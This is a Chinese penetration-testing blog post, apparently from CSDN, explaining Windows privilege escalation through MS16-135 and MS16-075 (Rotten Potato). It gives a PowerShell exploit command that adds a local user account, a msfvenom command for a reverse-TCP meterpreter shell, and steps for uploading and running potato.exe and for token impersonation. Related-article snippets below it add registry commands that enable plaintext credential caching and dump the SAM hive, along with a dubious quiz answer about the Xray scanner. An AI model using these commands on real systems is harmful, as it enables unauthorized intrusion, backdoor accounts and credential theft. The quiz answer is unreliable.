ms16-075提权

最新推荐文章于 2023-03-08 09:46:22 发布
最新推荐文章于 2023-03-08 09:46:22 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lansefly1990/article/details/104537748
版权 
利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

利用ms16-135内核漏洞提权,
powershell -nop -exec bypass -c "& {Import-Module 'C:\Users
\123\Desktop\MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c  net user HELPS amin!@#45 /add'}",执行完成后可成功添加账户

利用ms16-075提权

  1. 生成msf生成反弹木马

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.153.130  LPORT=4433 -f exe -o 4433.exe

  1. 将反弹木马上传到靶机,执行后,msf反弹会shell,可见当前用户权限为iis

  1. 上传potato.exe到靶机

potato.exe下载地址:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

dir可看到potato.exe已在靶机目录中

  1. 执行potato.exe

list_tokens –g   列出目标主机用户组的可用令牌

 

use incognito  加载incognito功能

list_tokens –u  列出目标主机用户的可用令牌

execute -cH -f potato.exe

成功提权,结果如下

 

yusec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
烂土豆Juicypotato【MS16-075提权
nextlubricate的博客
11-15 540
原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继将不再起作用。但是,跨协议攻击(例如HTTP-> SMB)仍然可以正常使用! 使用条件 1、查看当前用户权限,是否符合要求 whoami /all whoami /priv 如果开启SeImpersonate权限,juicypotato的
【漏洞复现】Metasploit下利用ms16-075提权
cj_Hydra's Blog
04-13 3768
前言: ms16-075漏洞介绍: Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应...
ms16075提权Windows Server 2008
可爱的我可爱的code
11-19 693
欢迎大家去我博客查看原文:http://www.xpshuai.cn/posts/29481/ 光看网上的文章是不够的,还是要多动手才行 ms16-075漏洞简介 Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 漏洞详情,请戳这里 开始动手 1.假设是msfvenom生成木马,目标.
windows提权常用系统漏洞与对应的补丁编号
sweelg的博客
05-29 4222
CVE-2021-1732[Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796[Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909..
Windows烂土豆提权复现(MS16-075)
oiadkt的博客
03-08 1974
Windows烂土豆提权复现(MS16-075)
ms16-032本地溢出漏洞
06-27
ms16-032本地溢出漏洞
057-红队测试之Windows提权小结.pdf
09-20
Windows 提权小结 Windows 提权是指攻击者通过利用操作系统或软件应用程序中的漏洞、设计缺陷或配置错误来获得不允许的访问权限。这种权限升级可以使攻击者获得更高的访问权限,从而控制系统或访问敏感文件。 ...
三菱PLC QD77MS QD77MS16定位模块视频 编程讲解教程+使用手册+程序样例.zip
06-15
第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前...
M_D77MS16 FB库
11-23
M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库
记一次HW实战笔记 _ 艰难的提权爬坑1
08-03
MS16-075漏洞是一个Windows SMB服务器特权提升漏洞,由CVE-2016-3225标识。攻击者可以通过转发认证请求来利用这个漏洞,进而执行任意代码并获得更高的权限。微软通过KB3164038补丁修复了这个问题。攻击者通常需要先...
烂土豆 (ms16-075) 提权方法
good good study
03-11 9829
所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
烂土豆提权MS16-075)--令牌窃取提权
bring_coco的博客
05-28 3805
漏洞介绍 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。 注:烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
Windows 提权
qq_53742230的博客
07-15 3540
Windows 一些提权手法总结
〖教程〗Ladon提权MS16-135参数版(WIN7-2016)
K8哥哥
08-08 1211
漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地提权 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
记一次ms16-032成功提权win7/win12
weixin_30608503的博客
04-03 517
E:\Tools\提权大结合\ms16-032>whoami pc-20140503jfge\administrator   首先查看权限是administrator 随后溢出 可以看到是system权限了 这是拿我本机试的。 可以在win12上成功溢出 exp不开源 转载于:https://www.cnblogs.com/wh4am1/p/6663998...
获取windows hash的几种方式
lansefly1990的专栏
02-26 6397
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash 该hash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
注册表读取windows hash
lansefly1990的专栏
06-30 1044
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f #重启或用户重新登录后可以成功抓取 cmd修改注册表命令: 1、从注册表读取windows hash reg save hklm\sa
计算机组成原理.zip
最新发布
06-20
计算机组成原理.zip
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。而在选项中,只有 XSS 漏洞是可以被 Xray 发现的,其他的漏洞类型不在 Xray 的扫描范围之内。因此,选项 A 是正确答案。选项 B 中的 shiro 是一个 Java 安全框架,不是漏洞类型。选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值